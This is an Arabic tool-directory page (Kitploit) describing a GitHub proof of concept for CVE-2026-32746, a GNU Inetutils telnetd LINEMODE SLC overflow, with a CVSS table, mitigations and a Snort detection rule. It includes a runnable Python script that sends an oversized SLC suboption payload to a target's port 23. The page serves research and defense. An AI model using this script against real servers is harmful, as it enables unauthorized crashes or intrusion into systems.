Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/kaleth4/cve-2026-32746
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

إثبات مفهوم لاستغلال CVE-2026-32746، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد في GNU Inetutils telnetd عبر تجاوز سعة المخزن المؤقت في LINEMODE SLC. يتضمن تحليلًا فنيًا ومقاييس CVSS وإرشادات التخفيف.

عرض المستودع
2منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 الملخص التنفيذي

ثغرة حرجة | CVSS 9.8 | تنفيذ عن بُعد للكود! تتأثر: GNU Inetutils Telnetd (الإصدارات السابقة لـ 2.7) النوع: كتابة خارج الحدود (OOB Write) في معالج الخيارات الفرعية LINEMODE SLC ناقل الهجوم: الشبكة (المنفذ 23) | لا يتطلب مصادقة التأثير: تنفيذ عن بُعد للكود بصلاحيات عملية Telnetd


🎯 📖 الوصف الفني

تم تحديد تجاوز سعة المخزن المؤقت بسبب كتابة خارج الحدود (OOB Write) في الدالة add_slc في خدمة telnetd الخاصة بـ . يسمح هذا الخلل للمهاجم عن بُعد بـ من خلال التلاعب بـ في بروتوكول Telnet.

GNU Inetutils
حقن كود تعسفي
الخيارات الفرعية SLC (Set Local Characters)

🔍 التفاصيل الرئيسية

  • الدالة المعرضة للخطر: add_slc (معالجة الأحرف المحلية).
  • السبب الجذري: غياب التحقق من الحدود في المخزن المؤقت الداخلي.
  • الاستغلال: إرسال كميات كبيرة من تسلسلات LINEMODE SLC الخبيثة.
  • المتطلبات: لا شيء (وصول مباشر إلى المنفذ 23).

🛠️ 💻 إثبات المفهوم (PoC)

يمكن للمهاجم استغلال هذه الثغرة عبر حمولة Telnet خبيثة تُشبع المخزن المؤقت الداخلي:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Repetición de 600 veces

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload entregado. Verificando caída del servicio/RCE...")

⚠️ تحذير! هذا الكود لأغراض تعليمية وبحثية فقط. استخدامه على أنظمة دون إذن غير قانوني.


📊 📈 مقاييس المخاطر (CVSS 3.1)

المقياسالقيمةالوصف
المتجهAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hعن بُعد، دون مصادقة
الدرجة9.8 (حرج) 🔴تأثير عالٍ على السرية والنزاهة والتوافر
النشر13 مارس 2026آخر تعديل: 5 مايو 2026

🛡️ 🔒 التخفيف والحلول

🚀 الحل الفوري

✅ تحديث GNU Inetutils إلى الإصدار المصحح (ما بعد 2.7).

⚡ حلول بديلة

🔹 تعطيل telnetd والانتقال إلى SSH (موصى به). 🔹 حظر المنفذ 23 في جدران الحماية الطرفية. 🔹 تكوين IDS/IPS لاكتشاف تسلسلات LINEMODE SLC الشاذة.

🛡️ إعدادات أمان إضافية

  • قواعد Snort/Suricata:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
  • **
تنزيل الأداة